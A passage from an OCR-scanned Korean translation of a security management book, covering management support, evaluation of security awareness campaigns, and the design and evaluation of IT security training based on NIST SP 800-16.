한다. 프로그람개발을 위한 재정적지원도 받아야 한다. 례로서 매해 경영자는 의식화자료 
와 의식화사업자금을 할당해야 한다. 목적들，토력 및 다른 자료에 대한 자료계산서，시 
간계획서를 포함한 사업계획을 작성하라. 그리고 구체적인 가능한 문제들을 세워야 한다 
(즉 15분비데오，펜，연필 등). 경영자로 하여금 계획을 승인하고 보안의식화자료를 만들 
고 완성 하기 위한 특별 자금을 할당하도록 하여 야 한다. 

일부 종업원들에게 의견이 좀 있을수 있다는것을 명심하라. 이런 종업원들은 협의회 
에 참가하지 않고 절 차를 무시하며 보안방책 을 위 반함으로써 부정 적 인 분위 기 를 조성 하 
게 될것 이 다. 또한 종업 원 이 보안조치 를 고의 적 으로 반대하면서 방책 상 문제 를 놓고 경 영 
자와 싸우는 드센 반항도 있을수 있다. 실례로 여러 기관들에서는 워크스테이션의 플로 
피디 스크구동기 를 달아 놓아 망에 비 루스가 침 투 못하게 할수도 있 다. 종업 원 이 매 우 불 
손하게 나온다면 경 영 자는 플로피 디 스크구동기 가 동작하지 못하게 하는것 을 금지 시 킬수 
도 있다. 이 렇 기때 문에 의 식 화깜빠니야와 이 어 진 보안절 차를 시 작하기 전에 경 영 인의 지 
원을 받는것이 중요하다. 

일 부 종업 원 이 반대한다 하더 라도 대 부분의 종업 원들(필 자는 이 런 종업 원 이 98%라 
고 확신한다.)은 자기 일을 잘하려고 하며 정확히 하고 규정대로 하려고 한다. 부정적인 
자들이 있 다고 해 도 주저하지 말아야 한다. 당신의 노력 을 헛되 게 하지 말라. 콤퓨터보안 
이 너 무도 중요하므로 몇 사람의 방해 자가 있 다고 해 도 기 관의 훌륭한 보안실 행 을 단념할 
수는 없는것이다. 

회사들은 흔히 의식화과정을 찬성은 하지만 인적 및 재정적자원은 할당하지 않는다. 
거기에 구애되지 말아야 한다. 계획은 크게 하고 시작은 적게 하라. 전자우편통보문을 보 
내거나 소식지에 통보를 싣는것과 같이 단순한것용 첫 단계에서 비용이 적게 들면서도 
효과적일수 있다. 경영자들이 의식화자료의 효과를 알기 시작할 때면(물론 경영자들은 
알게 될것 이 다.) 경 영 자들은 필요한 자원을 할당할수도 있다. 중요한것은 현재 있는 자원 
으로(혹은 자원이 없어도) 자기 가 할수 있는 모든것을 계속 애 써 해 나가는것 이 다. 

종업 원들은 IT 체 계 를 보호하는데 서 유일하게 가장 중요한 요인 이 다. 훌륭한 보안실 
천 에 대 하여 인식하면 사용자들은 정 보가 안전하게 리용되 게 할수 있 다. 


Web page 주소 : http:/ 八 vww.frentiemet.net/ 〜 mlambert/awareness/ 에 게재된 CISSP 인 Mike La 
mbert 의 보안의식화요령을 보라. 
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보안의식화과정을 비롯한 모든 경영계획을 주기적으로 검토평가해야 한다. 대부분의 
기관들에서는 공식적인 량적 및 질적분석을 진행할 필요가 없을것이다. 사람들의 행동과 
태도가 변하였는가 하는것을 격식 이 없이 검토감시 하는것으로도 충분할것 이 다. 아래 에 
고려 하여 야 할 몇 가지 간단한 선택 안들을 제기 한다. 

1. 종업원들에게 그들이 써넣을 조사서와 질문표를 나누어 주라. 신입사원강습기간 
에 의 식 화강습을 하였 다면(정 해 진 3〜6개 월기 간이 지난후에 ) 강습을 다시 하여 
리해정도를 알아 보라(즉 기 억 하고 있는것은 어떤것 인가，어떤 정 보를 더 알고저 
하는가 등…). 

2. 아침에 커피한잔을 들면서 방에 있는 다른 사람들에게 의식화깜빠니야에 대하여 
물어 보라. 그들이 새로운 포스타를 좋아 하는가，모임을 하는 기간에 과자와 에 
스키모를 좋아 하는가，콤퓨터보안에 대한 종업원들의 의식과 책임을 높이는것이 
목적 이 라는것 을 기 억하라. 그리하여 지 어 《 그 포스타는 어리 석 다.》라고 응답하 
더 라도 조급해 하지 말라. 이미 예견하였던 그대로이며 중요한것은 그것 이다. 

3. 의식화깜빠니야 전후에 일어 나는 보안사고들의 수와 그 류형을 장악하라. 아마 
도 보고되는 사고의 건수가 늘어 나면 그것은 좋을것이다. 그것은 사용자들이 콤 
퓨터보안위 반 혹은 사고가 아닌가고 의 심스러 워 하는 경우에 어 떻게 하며 누구에 
게 보고해야 하는가를 알고 있다는 표시이다. 

4. 사용자의 행동을〈〈 불시점검》하라. 사무실을 순회하면서 사용자가 없는데 워 크 
스테 이 션이 망에 가입되 였는가 혹은 기밀매체 들(플로피 디스크나 CD 들)을 잘 보관 
하고 있는가를 검 열하라. 

5. 내부망을 통하여 의식화자료들을 내보내는 경우에는 강습생들의 이름과 완성상태 
를 기록하라. 누가 자료를 다 보았는가를 정상적으로 검열해 보아야 한다. 자료를 
다 본 사람들에게는 계획된 질문서를 보낼수 있다. 

6. 종업 원통과암호들에 대 하여 통과암호해 제프로그람을 체 계관리 자가 실 행하게 하라. 
이것이 실행되면 독립를퓨터에 프로그람을 기동시키고 망에 그것을 설치하지 않 
는것 이 좋다. 흔히 망봉사기 에 이 런 류형의 쏘프트웨어를 설치할 필요는 없다. 인 
터네 트로부터 구입할수 있는 통과암호해제무료프로그람은 흔히 악성 코드를 가지 
고 있으므로 기 다리 고 있는 해커 에게 통과암호목록을 보내게 되 여 있어 경계해 야 
한다. 


보안의 식화과정 의 본래 의 목적 혹은 목표가 작성 되 였는가 하는것 을 평 가공정 에 서 검 
토하고 답변해 야 한다는것 을 명심하라. 때때 로 잘못 선택된 항목을 집중적 으로 평 가한다. 
실례로 의식화과정을 평가할 때 지난해에 얼마나 많은 사고들이 일어 났는가 하는것을 
매 종업원에게 물어 볼 필요는 없을것이다. 그러나 보안사고가 있는것 같다고 생각할 때 
에는 련계를 가져야 할 사람을 아는지 매 종업원에게 물어 보는것은 좋을것이다. 




요 약 


종업원들은 정보체계보안계획의 유일하게 가장 중요한 요소이며 경영진의 지원은 의식 
화과정의 성공을 담보하는 열쇠이다. 

보안의식화과정은 기관의 정보체계보안계획 에서 기본으로 되여야 한다. 체계보호에 
필요한 운영 및 기술적대처안외에 의식화(와 강습)는 필수적인것으로 된다. 각이한 범죄 
통계는 위험의 65〜70%가 내부에서 일어 난다는것을 보여 준다. 이것은 기관종업원들의 
60%가 체계에 대한 해커로 되고 있다는것을 의미하지는 않는다. 이것은 의식적이건 무 
의식적이건 종업원들이 체계에 일정한 형태의 해를 줄수 있다는것을 의미한다. 이것은 
화면보호프로그람의 비 법복사판적재，인터네 트로부터 공유웨어 의 내 리적재，약한 통과암 
호의 사용，다른 사람들과의 통과암호의 공유가 바로 그러한것 들이 다. 그러 므로 종업 원를 
은 IT 체계의 《 행동규칙》과 훌륭한 콤퓨터보안기술의 실행 방법을 알아야 한다. 나아가 
서 련방기 관들의 모든 련 방공무원들은 법 (1987 년 를퓨터보안관계 법)에 따라 매 해 보안의 
식화강습을 받아야 한다. 

보안의식화과정은 기관의 구체 적 인 필요에 따라 작성되 여 야 한다. 첫 단계 에서는 과 
정의 목표(무엇을 달성해 야 하는가)를 결정 하고 다음에는 과정계 획을 세워 야 한다. 이 계 
획은 전문가적견지 에서 경 영 자에 게 제출되 여 야 한다. 과정은 인원，자금 및 도덕적지원 
등의 성 과를 거 두는데 필 요한 자원 들을 보장받게 할것 이 다. 초기 에 는 리용할수 있 는 자 
원 이 부족하다 하더 라도 간단하고 비 용이 들지 않는 방법 으로 정 보를 분배하는것 부터 시 
작하라. 시작해 놓고 더 많은 자원을 찾아 내며 다음에 주요한 IT 림성원들로부터 방조를 
받는것 이 중요하다는것 을 명 심하라. 


강 습 


강습은 의 식 화과정 보다 더 공식적 이며 대 화적기능이 더 강하다. 사업능력과 사업능 
률을 높여 주는 지식을 쌓고 기술을 련마하며 능력을 키워 주는 방향에서 강습을 주어야 
한다. 강의 를 오랜시 간 지 루하게 할것 이 아니 라 대 화적 이고 내 용 있는 강습을 해 야 한다. 
지식을 어떻게 전달하는가에는 관계없이 구체적인 지식만 가지고 있는 강사를 선발하던 
시기는 이미 지나갔다. 강습(즉 양성)은 지금 전문가들이 교육리론，절차 및 기교를 알것 
을 요구하는 사업이다. 강습에서는 청강자들이 강습을 마치면 자기 일에 적용할수 있는 
기술과 실천기능을 높여 나갈수 있게 하는데 집중해 야 한다. 강습은 또한 추동력을 줄수 
있어 야 한다. 따라서 강습에서는 청강자들에게 더많이 배우려는 호기심을 불러 일으켜 야 
한다. 

지난 10년간 정 보체 계보안양성 분야에서 는 정 보기 술의 급속한 발전에 보조를 맞추기 
위한 시도가 있었다. 한가지 실례는 표준 및 기술중앙연구소 ( NIST ) 문건 SP 800-16《 IT 보 
안강습요구사항: 역할 및 수행모형》이다. 1998년에 작성된 이 문건은 IT 보안강습계획을 
278 




개발하는 련방기관들에 지도서를 제공해 준다. 사영분야의 기관인 경우에도 NISTSP 
800-16 이 어 떤 류형 과 수준의 정 보를 제 공해 야 하는가에 대 한 기 준선을 규정하는데 도 
움이 될수 있을것 이 다. 이 런 리유로 하여 이 장에 서 는 NIST 문건을 간단히 고찰한다. 이 
장에 서 는 계 속하여 강습을 위한 전통적 인 교수체 계 구성 안 ISD 의 단계 즉 요구분석，목표 
제시，설계，전개，실현，평가를 취급한다. ISD 안은 교수계획에 대한 체계적인 고찰을 제 
공하며 매 단계들사이의 중요한 관계와 련계를 강조한다. ISD 안에서 의의 있는 기본측면 
은 양성목적을 내용자료의 련속적 인 설계와 전개에 두는것이다. ISD 안은 강습을 받고 나 
서 강습생이 무엇을 하며 무엇을 할수 있겠는가에 중심을 두면서 시작하게 된다. 이렇게 
시 작하지 않으면 나머 지 단계 들은 비 능률적이 며 비 효과적 인것 으로 될 수 있 다. 그러 므로 
첫 단계에서는 강습의 필요성과 목표를 준다. 설계 및 전개단계 에서는 내용，교수전략 및 
강습방법들이 결정된다. 실현단계는 자료의 실제적인 전수 단계이다. 일반적으로 전수내용 
에 대 한 평 가가 실현 단계 이 후에 있게 되 는것 으로 보지 만 이 런 평 가는 강습의 전과정 에 서 
계속되는것 으로 보아야 한다. 지도서의 마지 막부분에서는 제기된 IT 보안과정 안을 제공한 
다. 이 과정안에 는 IT 체 계 를 보호하는데 요구되 는 각이한 직 무의 역 할을 수행하는데 필 
요한 여 러 학과목들이 있다. 기 관의 과정안은 설정된 강습의 필요성 에 부합되 여 야 한다 
는것 을 명 심하여 야 한다. 

NIST SP 800-1 6 《IT 보안강습요구사항: 역할 및 수행모형〉〉 (NIST Web 
site http://csrc.nist gov/nistpubs/ 에서 구입할수 있음) 

NIST SP 800-16 IT 보안학습련속과정 은 정 보체 계 보안강습과정 작성 의 기 본틀거 리 를 
제공한다. 의식화과정을 시작한 다음 강습에로의 이행 단계는《보안기초 및 인식》이 다. 

《보안기초 및 인식》의 교수목표는 주요보안관계술어와 개념을 주어 보안지식의 토대를 
쌓는것이다. 이 기초지식은 모든 기타 강습과목의 기초로 된다. 

구체적 인 작업명 으로 종업원들을 갈라 보는 경 향이 있지만 NIST SP 800-16 보안학습 
련속과정의 목표는 정보기술과 관련된 직무명이 아니라 직무기능에 집중하는것이다. 
NIST 의 IT 보안학습련속과정은 변하는 로동력과 관련하여 마련된것이다. 즉 종업원들의 
역 할이 달라 지기때문에 다시 말하여 기관이 달라 지기때문에 IT 보안강습에 대한 요구도 
역시 달라 진다. 10년전의 체계관리자의 책임과 일상 업무를 오늘과 비교하여 생각해 보 
라. 그 과정 에 종업 원들은 IT 체 계 와 관련 하여 각이한 역 할을 습득하게 될 것 이 다. 그러므 
로 SP 800-16 에 서 는 체 계관리 자가 해 당 과정안을 요구한다고 하는것 이 아니 라 해 당 IT 
체계기능을 책임진 사람이 해당 형태의 강습을 요구하게 될것이라고 지적하고 있다. 

본질상 어 떤 IT 체 계의 보안효과가 요구되 는가 하는것 을 결정하게 되 는것은 직 업기능 
과 해 당한 책 임 인것 이 다. 이 런 견해 에 의하면 종업 원은 여 러 가지 직 업상 요구를 지 니게 
될것이며 따라서 여러가지 의무를 수행하자면 여러가지 등급의 IT 보안강습을 요구하게 
될것이다. 이런 새로운 견해를 인정하고 표준직무류형들을 기본구상에 맞추러고 하는것 
은 하나의 난점으로 될수 있다. 어떤 기관들에서는 이것이 불가능할수 있다. 그러나 직능 
혹은 기 관에 무관계하게 IT 체 계보안과정 안에 는 몇 가지 IT 보안문제 들이 포함되 여 야 한다. 
기 관의 당면한 필요성 에 따라 해 당한 강습과정 안을 선택 적 으로 진행하여 야 한다는것 을 
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항상 명심 하여 야 한다. 

리상적으로는 모든 기관들이 IT 보안강습과정의 모든 측면에 즉시적으로 투자할 재정 
적자원을 가지고 있을것이라고 볼수 있을것이다. 그러나 자원사정으로 강습을 해야 할 
필요성을 따져 보지 않으면 안되는것이 현실이다. 어떤 경우에는 즉시적인 강습의 필요 
로부터 강습의 앞부분이나 1장만 주게 되는 경우도 있다. 

경영자측의 지원 

과정 안내용을 분석 하고 전개 하기 에 앞서 강습프로그람의 첫 난관의 하나로 되 는것 은 
각급 기 관들과 특히 는 상급경 영 측으로부터 자원을 받기 어 려운것 이 다. 어 느 기 관에 나 강 
습을 주자고 하는 사람들과 일하면서 배 우는것 을 주장하는 사람들이 있 다. 다시 말하여 
어떤 경영자들은 강습이 아주 중요하며 따라서 재정적으로 지원하려고 하나 다른 경영자 
들은 강습에 돈을 쓸수 없으며 따라서 종업원들은 일을 하면서 필요한 기술을 배워야 한 
다고 한다. 그러므로 중요한 첫 단계는 회사가 보장하는 강습이 가치가 있고 필수적인것 
이 라는것 을 상급경 영 자들에 게 인식 시 키 는것 이 다. 

상급경 영 자는 강습이 모든 사람들의 사업 항목에 서 제 일 웃자리 에 있 다는것 을 리 해할 필 
요가 있다. 종업원들이 새로운 기술을 요구하는 일을 할것을 바란다면 강습의 가치를 잘 고 
려하고 평가해야 한다. 

강습을 후원하는것이 중요하다는것을 상급경영자들에게 설득시키자면 다음과 갈은 
내용을 알아야 한다. 

1. 강습은 종업원들의 사뢰를 막는데 도움을 준다.《 아니요，그건 맞지 않소. 우리 
는 우리 의 종업 원들을 강습 주는데 돈을 썼지만 그들은 떠나게 되 며 결국 배 운 기 
술을 다른 회사에로 가져 가게 되오.》이렇게 말하는 사람들은 하나는 알지만 다 
른것은 모르는 사람들이다. 그런 종업원들은 어쨌든 떠나 갈것이다. 그러나 전반 
적 인 종업원들은 자기 일을 하다가 난관에 부닥치면 회사에서 기능을 높여 줄것 
이 라고 믿는다. 그러므로 회사는 결국 행운을 만나게 될것 이 다. 

2. 강습을 주장할수 있는 경영자들속에서 동맹자를 찾아 내야 한다. 상급경영자들이 
기 업계획을 토론할 때 회 의 에서 누구든지 강습계 획 에 대 하여 긍정적 으로 발언하 
도록 하는것이 중요하다. 

3. 강습이 기관의 요구를 반영하도록 해야 한다. 많은 경우에 강습에서 혜택을 입게 
된다는것을 경영자들에게 납득시킬 필요가 있을것이다. 이것은 실행자가 현존 계 
획의 약점을 알아야 하며 강습을 주면 지금까지 풀리지 않던 문제들이 풀릴수 있 
는가를 알려 주어 야 한다는것 을 의 미한다. 

4. 강습계획을 모든 종업원들에게 알려 주라. 일부 종업원들은 기술을 쉽게 배울수 
있으므로 강습을 받으면서 시간을 보낼 필요가 없다고 생각한다. 그러므로 종업원 
들의 기업상 요구를 강습에서 어떻게 해결하는가를 강조하는것이 중요하다. 

5. 작은 규모에서 시 작하여 성과를 거두라. 초기계 획 이 훌륭하였다면 경 영 자는 강습 
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에 자원을 더 잘 할당할수도 있을것이다. 

6. 경영자의 반대조건을 알아 내라. 상정되는 문제나 난점을 알아 내라. 강습과정안 
에 서 그들이 좋아 하는것 과 좋아 하지 않는것 을 밝히 라. 리용되 는 강습과정 안이 
이 런 난점 들을 극복할수 있 게 하라. 과정안에 경 영 자의 구상을 반영하라. 과정안 
이 모든 사람들의 희망을 다 만족시킬수는 없지만 대부분의 사람들의 요구를 만 
족시킬 만한 가치 가 있게 하라. 


정보체계보안강습의 요구설 정 


경영자의 승인을 받은후 강습과정 안개발의 첫 단계는 강습의 요구를 제기하고 그것 
을 규정하는것 이 다. 종업원이 말은 일을 수행할수 있는 지식과 기술기능수준을 가지고 
있지 못하는 경 우에 강습의 요구가 제 기된다. 이것은 또한 해 당한 작업 에 대 한 사업능률 
표준안들이 있어야 한다는것을 의미한다. 사업능률표준안에는 작업내용과 그 수행에 필 
요한 지식，기술기능，능력 및 경험 (KSA & E ) 이 반영되여야 한다. 그다음에는 종업원이 
현재 소유하는 KSA & 묘와 제 기된 작업 을 성 과적 으로 수행하는데 필요한 KSA & Es 을 
비교하라. 이것들사이에 있게 되는 차이가 강습의 요구로 된다. 

정 보체 계보안분야에 있는 정 부의 몇개 기 관들은 직 능표준을 규정하였 다. NIST SP 
800-16 외에도 전국보안통신 및 정보체계 보안위원회 ( NSTISSC ) 는 정보보안 ( INFOSEC ) 강습 
표준규정 을 제기하였 다. 실례 로 NSTISSC 는 네 가지 특정한 IT 보안직능 즉 정 보체계보안 
전문가들 ( NSTISSC #4011)， 지 정 승인기 관 ( NSTISSCM 012)， 정 보체 계보안의 체 계담당관리 자 
( NSTISSC #4013) 와 정 보체 계보안관 ( NSTISSC #4014) 을 위한 전국강습표준규정 을 제 기하였 
다. NIST 와 NSTISSC 문건들은 정보체계보안과제 및 책임을 수행하는데 필요한 표준규정 
을 확정하는데 도움 이 될 것 이 다. 

일 단 요구사항들을 분석한 다음의 단계 는 강습의 요구사항들에 우선권별 로 순차를 
정 하는 단계 이 다. 이 런 단계 를 결정할 때 법 적 요구들，비 용의 효과성，관리 의 긴박성，기 
관의 취약성，위험，정보의 비밀성과 위험요소 그리고 강습생은 어떤 사람들로 한다는것 
과 같은 여 러 가지 요인들을 고려하여 야 한다. 어 떤 기 관들(즉 련 방기 관들, 은행，보건기 
관들)의 법 적요구사항들은 진행하게 되 는 강습내 용선택 을 지 정하여 준다. 비 용의 효과성 
을 알자면 강습 받지 못한 직원들에게 주는 비용에 대하여 생각하라. 실례 로 망의 실패와 
관련한 비용은 큰것이다. 보안체계가 닫기고 기관의 IT 운영이 장기간 멎게 되면 자금손 
실과 시간랑비는 엄청나게 된다. 그러므로 체계관리자들에 대한 강습에 1차적인 우선권 
을 부여해야 한다. 그것은 행정적부하를 가장 많이 안고 있는 직업이 정보총괄책임자 
( CIO ) 나 IT 정보관이기때문이다. 기관에서 위험요소평가를 했을 때에는 책임경영측이 가 
장 위 험 하다고 인정 하는 내 용에 대 한 강습을 먼 저 진행하게 할것 이 다. 마지 막으로 문제 
성 이 가장 크며 강습의 필요성도 가장 긴박하게 느끼는 강습생을 먼저 강습 받게 한다. 

기술이 기하급수적으로 발전하므로 정보체계보안도 계속 발전된다. 기술이 변하는것 
만큼 체계의 취약성과 위험성도 커진다. 한걸음 더 나아가서 새로운 위험은 새로운 대응 
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책 을 요구한다. 이 모든 요인은 IT 체 계 전문가들의 강습을 계 속 진행할것 을 요구한다. IT 
보안강습과정 안은 또한 그러한것 으로서 전개되 여 야 하며 기술혁 신과 더불어 확대되 여 야 
한다. 

요구분석，표준규정 의 제정，강습대 상의 순위규정 목표와 목적 의 결속에서 명 심할것 은 
정 보체 계보안강습과정 을 시 작할 때 그 중요성 에 대 하여 경 영 자와 종업 원에 게 확신시 키 는 
것이 필요하다는것이다. 모든 사업계획에서와 마찬가지로 강습과정의 성과도 기관의 전 
반적 인 IT 보안목표들을 실 행할수 있는 능력 에 달려 있다. 그러 므로 이 보안과정 의 시 작 
에 서 이 목표들은 명 확히 규정해 야 한다. 

과정계획작성 

강습의 대상이 주어 지면 강습과정계획을 세울수 있다. 과정계 획 에서는 강습과정 을 
만드는데 필요한 특정한 설비，자료，과업，시 간표，인원，재정 원천을 개 괄한다. 과정계 획 
에서 는 특정한 계 획대 상들을 위한 항목과 갈은 수행해 야 할 작업들의 순서 와 내 용들을 
밝히게 된다. 강습관리 자들이 범하게 되는 대부분의 일반적오유들중의 하나는 계획 이 필 
요 없다고 생각하는것이다. 

또 한가지 오유는 상급경 영 자로부터 과정 계 획승인을 받지 않는것 이 다. 과정 계 획 에 서 
불가분리적인것의 하나는 계획이 실현되도록 하는것이다. 그러므로 다음 단계로 넘어 가 
기에 앞서 상급경영자와 함께 계획을 검토하라. 또한 이 단계에서 견해일치와 합의를 보 
는것은 다른 사람들을 그 일에 참가하게 하며 그들이 일의 한 몫을 맡고 있다고 느끼게 
끔 해춘다. 이것은 성과의 주요한 요인이다. 

교수전략(강습설계와 작성) 


강습프로그람과정의 설계는 학습목적에 기초한다. 학습목적은 강습의 필요성에 귀착 
된다. 그러므로 교수전략(강습전수방법)은 학습목적을 실현할수 있는 가장 좋은 방법에 
기초한다. 

교수전 략을 선택하는데 서 는 학습목적 을 위한 가장 좋은 방법 의 선택 과 강습생 의 수 
그리고 강습자료를 효과적으로 전수할수 있는 기관의 능력에 중심을 두어야 한다. 문제 
해 결 의 열 쇠 는 학습목적，강습생 들과 기 관을 리 해 하는것 이 다. 

설계 및 작성단계 에서는 내 용자료를 개괄하고 강습내 용의 절 혹은 과들을 구성한다. 
종업 원들이 알아야 할것 과 그들이 직 무를 수행 하기 위하여 해 야 할것 에 기 초하여 내 용을 
확정해 야 한다. 필요성분석단계 에서는 특정한 작업기 능을 위한 과업 과 임 무를 수립할수 
도 있다. 내용이 과업과 관련된것이 아니라면 어떤 행동과 태도를 내용에 포함시키겠는 
가 하는 문제에 초점을 두어야 한다. 다시 말하여 목적에 부합되게 종업원들이 취함 태 
도와 목표수행에 필요한것을 내용에 포함시킨다. 기본은 행동과 태도에서 능력 있는 사 
탐으로 되자면 무엇을 해 야 하는가를 묘사하는것 이 다. 
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균형 이 잡힌 정 보체 계 보안강습과정 에 는 여 러 가지 학습방법 이 있 을것 이 다. 교수전 략 
을 정하는데서 중요한 원칙의 하나는 될수록 간단하면서도 목적들을 달성하는 전략을 선 
택하는것으로 되게 하는것이다. 또하나의 요인은 교수자료자체이다. 모든 내용이 다 한 
형태의 강습전략에 곡 맞는것은 아니다. 즉 강습에서 성과를 거두자면 강습목적과 내용 
을 보고 강습생들이 배우는데 가장 좋은 방법 이 무엇인가를 결정 하여야 한다. 강습자료 
와 관련된 현행리론들중의 하나는 강습내용이 교육과 오락의 결합인 《교육유희》으로 
되여야 한다는것이다. 청강생이 누구이며 내용이 어떤것인가를 보고 학습목적에 가장 잘 
부합되 는 결심을 채 택 하여 야 한다. 

방법결정에서의 몇가지 요령 : 

• 청강자는 누구인가. 청강자의 규모와 위치를 고려하는것이 중요하다. 청강자가 많 
고 지리적으로 분산되여 있다면 기술에 기초한 해결책 즉 콤퓨터에 기초한 ( CD - 
ROM ) 혹은 Web 에 기초한 강습(인터네트를 통한 강습)은 더 효과적 일수 있다. 

• 기업의 필요성은 무엇인가. 실례로 제한된 액수의 려비만 청강생들이 리용할수 
있 는 경 우에 는 기 술에 기 초한 전수가 리용될 수 있 다. 기 술에 기 초한 전수는 교 
통비를 낮출수 있다. 그러나 기술에 기초한 강습은 흔히 더 많은 설계 및 작성 
비용을 필요로 한다. 그러므로 교통비용의 일부는 기술에 기초한 해결책을 개발 
하는데 돌려 지게 될것이다. 

• 강습내 용은 무엇 인가. 일 부 비 용들은 강사가 조정 하는 비 데오 ， Web 혹은 CD - 
ROM 을 통한 전수에 가장 잘 맞는것 이다. 가장 좋은 전수방법에 대하여 많이 토 
론하고 있지만(그리고 모든 사람들이 자기의 의견을 가질것이지만) 강습자료를 
평가하고 의견을 줄수 있는 강습전문가들의 조언을 따르는것이 좋다. 

• 어떤 형 태의 학습자대화가 필요한가. 강습내용이 제 일 좋은 경우는 자체진도에 
따르는 개별수업의 경우인가 아니면 학급별수업의 경우인가. 일부 강습자료들은 
일 대 일 과 학급별 수업대 화에 제 일 적 합하지 만 다른 내 용은 창조적 이 고 대 화적 
이며 개별화된 강습에 제일 적합하다. 실례로 청강생들이 단순히 정보를 받는 
경우에는 기술에 기초한 해결책이 더 적당할수 있을것이다. 청강생들이 학급에 
서 문제풀기 를 해 야 한다면 교실 에 서 강습 받는것 이 더 좋을것 이 다. 

• 어떤 형태의 전수 혹은 교실활동이 적용되여야 하는가. 강습내용상 강습생들이 
조작체 계 를 설 치하거 나 구성하여 야 하는 경 우에 는 실 습교실 이 제 일 좋을것 이 다. 

• 강습자료는 얼 마나 안정 되 여 있는가. 내 용의 안정 성 은 비 용문제일 수 있 다. 내 용 
이 자주 변하는 경우에 입게 되는 손실은 난이성，시간 및 자금인데 이것이 계 
산되여야 한다. 일부 강습전략들은 다른것보다 더 쉽게，더 적은 비용으로 수정 
할수 있다. 

• 어떤 형태의 기술을 강습전수에 리용할수 있는가. 이것은 강습전략을 결정하는 
데 서 결정 적 인 요인이 다. 최 근추세 는 인터네 트나 인트라네 트를 통하여 강습을 
전수하는것 이 다. 이 방법을 성과적으로 적용하자면 강습생들이 정보에 접근하는 
기술적능력을 가져야 한다. 실례로 대역너비 로 하여 전송될수 있는 다매체량(례 
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음성，비데오，동화상)이 제한될수 있는 경우에는 CD - ROM 해결책이 더 효과적일 
수 있다. 

강습전 략에 관계 없 이 정 보제 시 에 리용될 수 있 는 몇 가지 일 관성 있 는 요소들도 있 다. 
여 기 에는 음성，본문，정 화상과 동화상 그림 또는 그라프，비 데오，연시，모의，실례연구， 
대 화련습형 태 들이 속한다. 대 부분의 강습학과들에서 는 여 러 가지 제 시방법 들이 결 합된다. 
이로부터 모든 청강생들에게 전송하는데서 보다 큰 유연성파 강습내용을 전수하는 가장 
좋은 방법선택문제를 참작할수 있다. 리용할수 있는 강습전략에 익숙되지 않는 경우에는 
강습자가 조종하는 기술에 기초한 강습전수방법에 대 한 구체적 인 규정을 준 제 19장의 부 
록을 참조하는것이 좋다. 

어떤 형 태의 강습전략이 강습의 필요성 에 가장 적 합한가를 결정하는 경우에 정보의 
여러가지 수단을 개척하는것이 필요하다 . 개별적사람들은 사업상 기업동료들과 강습 전문 
가들에게 이전의 경 험을 물어 보고 그 응답을 따져 보아야 한다. 강습전략을 결정하는것 
은 강습목적，학과목내 용，전수방법，실 행항목，기 술적능력，시 간 및 자금과 갈은 리용할 
수 있는 자원에 기 초해 야 한다는것 을 명 심하여 야 한다. 

가능한 과정안 

제19장 부록 2에 는 IT 체 계보안강습학과목들로서 제 공될 수 있 는 IT 보안주제 들의 전 반 
적인 목록이 포함되여 있다. 목록은 적응성 있게 되여 있다. 기술이 변함에 따라 강습형태 
도 변할것 이 라는것 을 기 억하여 야 한다. 기 관에서 고려할수 있는것 은 바로 강습과목뿐이 다. 
또한 강습내 용들은 기 업 소의 특별 한 강습필 요성 에 따라 결 합되 고 재분류되 여 야 한다. 

부록들에는 제 목，간단한 내 용，예 견되 는 청 강생 들, 높은 수준의 주제 목록과 알맞는 
기타 정보들을 비롯하여 매 학과목에 대한 보다 구체적인 정보가 있다. 부록 2에 있는 
학과목들은 정 보체 계보안계 획 의 요구를 실현하는데 필요한 기 술기 능들에 기 초한것 이 다. 
모든 기 관들에서 는 우선 양성 의 필요성설정 을 앞세 우고 진행할 강습형 태 를 규정하는 사 
업 을 한다. 이 런 몇 가지 문제들은 제:3자적인 양성회 사에서 리용할수 있기때 문에 기 관에 
서 자체의 실정에 맞는 강습학과목들을 개발할 필요는 없는것이다. 그러나 기관에서 가 
장 효과적인 결과를 위해서는 자기 방책들과 절차들을 보강하여 강습자료들을 자체의 실 
정 에 맞게 해 야 한다. 이 렇게 자체의 실정 에 맞게 하는데 외부의 자원을 리용하면 기 관 
에 서 적 은 비 용을 들이면서 리 득을 볼수 있 다. 

정보체계보안강습계획의 평가 


강습의 효과성 에 대 한 평 가는 정 보체 계보안강습계 획 의 중요한 요소들중의 하나이 
다. 그것은 강습과정의 시작단계에서부터 계속 진행되는 과정이다. 평가사업은 강습과정 
의 나머지 모든 단계 즉 분석단계，설계 단계, 개 발단계，실행 단계 에서 반드시 계획 에 포 
함하여 진행하여 야 한다. 앞에서 언급된 nist SP 800-16 문건에 의하면 강습효과성 평 가 
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에는 명백하고 호상 련관된 다음과 같은 네가지 측정항목들이 있다. 즉 


1. 학습자의 주관적 인 만족과 학습에 조건들이 적합한가 하는 정도 

2. 주어 진 강습생 이 해 당 강습에서 무엇을 배 웠는가 

3. 해 당한 강습을 받고 난 다음 강습생들의 사업상태 

4. 기 관의 전반적 인 IT 보안강습과정 가운데 서 다른 형 태 들에 비한 이 강습의 가치 

평가공정에는 네가지 측정형식이 있으며 매 형식은 네가지 목적가운데서 하나와 련 
관된다. 평가는 다음과 같이 해 야 한다. 

1. 강습이후 종업 원들이 자기 들의 작업 수행 을 자체 로 평 가할수 있는 정 보를 산출해 
야 한다. 

2. 강습이후 개 별적강습생 들의 작업 수행 을 종업 원감독이 평 가할수 있는 정 보를 산출 
해야 한다. 

3. 강사들이 학습과 교수의 수준을 높이 게 하는 추세자료를 산출해 야 한다. 

4. 투자수익 통계 를 산출하여 책 임 공무원들이 신중한 전 략적 립장에 서 전체 로동력 의 
최 적결과를 위하여 여 러 가지 IT 보안의 식，보안활용능력，강습 및 교육항목들에 제 
한된 자원을 할당하게 해 야 한다. 

최 적 결과를 얻 자면 자료의 수집 및 리용계 획 을 세 우며 정 보(자료)를 평 가하고 그것 
을 기 관의 목적 에 따라 추정해 내기 위하여 분석 가들에게 요구되는 시 간에 대 한 계 획을 
세우는것이 필요하다. 

효과적 인 측정 및 평 가의 가장 중요한 요소들중의 하나는 알맞는 측정항목을 선 택 
하는것이다. 그러므로 평가의 형태에 관계없이 혹은 평가가 있는 경우에는 인식력, 지 
식 혹은 구체 적 인 기 술기 능항목과 갈은 평 가해 야 할것 에 대 하여 기 관에 서 합의보아야 
한다. 


로동시간 및 돈과 같은 자원들이 절실하게 요구되기때문에 강습과정의 평가는 강습계획 
의 전일적인 한 부분으로 되여야 한다. 

평 가하는데 는 비 용이 든다는것 을 명 심하라. 비 용에 는 생 각，시 간，노력 과 돈이 포함 
